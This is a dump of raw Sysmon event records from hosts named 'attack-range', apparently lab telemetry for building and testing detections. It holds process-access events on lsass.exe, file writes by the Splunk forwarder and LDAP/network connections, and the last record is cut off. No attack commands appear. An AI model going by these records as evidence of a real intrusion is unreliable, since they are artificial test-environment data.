Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B3ACC8B48436F402E27664DE54ECB2,SHA256=7F5375A3A8247EF3FCC65647854F3D8C10C0138EDC0CF830162B4A28C52FD69A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:08.664{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:08.664{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=7A19EF82F55BB623B671C86E33DBEC24,SHA256=AF2474F6DE12CEEF92B111A8B337DE951E3881DC21189420343D38F481684FD5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:08.523{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:08.508{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:08.508{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit\audit.csvMD5=7A19EF82F55BB623B671C86E33DBEC24,SHA256=AF2474F6DE12CEEF92B111A8B337DE951E3881DC21189420343D38F481684FD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:08.164{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=809300A01D6B65FDB7B806328F2F664C,SHA256=15D913B3E8726364D77A8B50681E3ED22D4BB3EF998EABAF4BD5C7D93F63977E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:09.346{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=476E891BEB99B73731D9ABDCCBF800D1,SHA256=3C349C81A43E9B62CBD7A0767ED2BCF0E5576B3AF01A905BB770DFD18713A076,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.994{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53310-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:07.994{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53310-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:09.648{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE1CC148A247621646A7061A07B1ADE0,SHA256=6AD13DE05EE5784158CA0C2B405338F789465561B12E7D78CB93DC158B6D2016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:09.648{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE08336BE7D4B63C9E6143BAD7EAB97D,SHA256=20640DDC335D9875F018DEFB8DC034000C8AED23616F38783D79B47140928A71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:09.523{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2877F4DAA9640637325181459920ACCB,SHA256=D5C078EA32135E2AA04936E715576AE897AC22B99296C078AE2870E800BE8491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:09.523{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=199A2BF36F4F5D2C4B7579D19F2CBD5F,SHA256=F5B0101A48D58EEBD04E8471B270402745B19FC801D214F7BBBE8C1A25951700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:09.180{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED6A481F30AFCB89B145A32A18138483,SHA256=E6F8520D020EB73525CAC2F18B13FDB0F85821D1E62474312CC99082DF1BE2A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:10.393{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0E7AF3D66293F9205E9B597A05D0C3,SHA256=430EFE5A1E32E6EA88E7569CC9DEF9677B42E1E460CE5C66B2FE29EFA1D4818C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:08.561{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53312-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000286219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:08.006{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53311-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:08.006{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53311-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:10.211{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D104F2EE1B053F8246BB56077ACC6D9D,SHA256=C1791459F545D000829704A6F5DA77BD296005EBDBA354DC970FD10D11817E63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:11.628{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B13D0A5F4A2D9596FC183FDF58AB232,SHA256=C234FED9BACBA65987FA771F7A463C115AC4C25C4C9986151EDD3CA60B7B0EC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:11.242{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBA690E72D9350FCE7BBB523E109C6A9,SHA256=9A13104FA94D05BBC3CCFD84EC560F2B62AAE9B7B22609BDE4FBC88F2876EB9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:12.737{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26A455C0A0366B11173AB4500B5A00C8,SHA256=FE783EBD0448613C27F47BA0FCE6712472840A9B193D084A367292DE96D65BED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:12.258{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC629F3DB177FE51682276C4E257D983,SHA256=BC1538D54DB17303767AB7A4FB69FA6C82054100009C83EBFDC946AA80928AD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:13.940{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5CA13C8ACF7B415C1EE28F458F60CF6,SHA256=D2AA2DC02622B0F177B9041FC2020C62A062A4BCC79CF15C7590F8295C9801BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:13.367{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78CD480AD66EF96E2BD9D7AD25460FB9,SHA256=87623979F9771C41B4030059CED692157C8EFEADDF09655D6593D40187D4E42F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:14.367{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8977AE855A242995DFC958DB48CBD9AC,SHA256=05FE5C7135D1FB32D942FD52C2FE5C506DDB88DFBC8937D3EA92E48F3FE0BA70,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:10.442{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51238-false10.0.1.12-8000- 354300x8000000000000000286226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:13.654{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53313-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:15.367{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DC634A6B8592D77291203524A7A5718,SHA256=E576E4FEE24ED71996D96F25874B299647499DFE09B9E823272B001846F6B615,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:15.128{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=642D76A16C6DE1BA3A586E2ECEAA45AF,SHA256=3BD1D3872675AC9AC419069539B394C9C8E36DE29BA9F81C51C1F48D3C89FD55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:16.383{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74DC56C75B44D5494FB7FB369389D936,SHA256=F7DBAC69EFF0F294A7CEDE1EF845AF34763F83EA0742972D187CEB1D43D0075A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:16.253{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F12CD64A772FAA7A202C6F409567889,SHA256=D6228534BECCF355F2B8331038DE9ADDA514B2D8171D7B280BD57D4650810763,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:17.430{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1ECD92BCF6C61BD9D1054CDEE16BE49,SHA256=FCEC65201482983C76FC53052B758800BA197FE1023A1EE0D162D9D427CD5E7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:15.613{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51239-false10.0.1.12-8000- 23542300x8000000000000000215169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:17.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB65B927F0883D0D8745A3146818D63,SHA256=275368F6C4F41D7F43D5E0B0BF86F18F3403AF12F69A3AAAAFC10C7E17B6B3DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:18.539{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F87D89AEF0E8758974847F1E8AC8190B,SHA256=785FC36A7B982275E1C9C61BE2A15D7F0EA8E4ABAAA1B11B88CA568627E1F560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:18.315{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0161B5C813020CAC104A542869DC7CC8,SHA256=B1D3D073CA67C686A689269052727B2C7C1A4B2202A486DE12DB4ACFFD87EC6B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.961{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F8B-6216-D004-000000003802}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.961{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.961{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.961{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.961{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.961{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0F8B-6216-D004-000000003802}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.961{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program 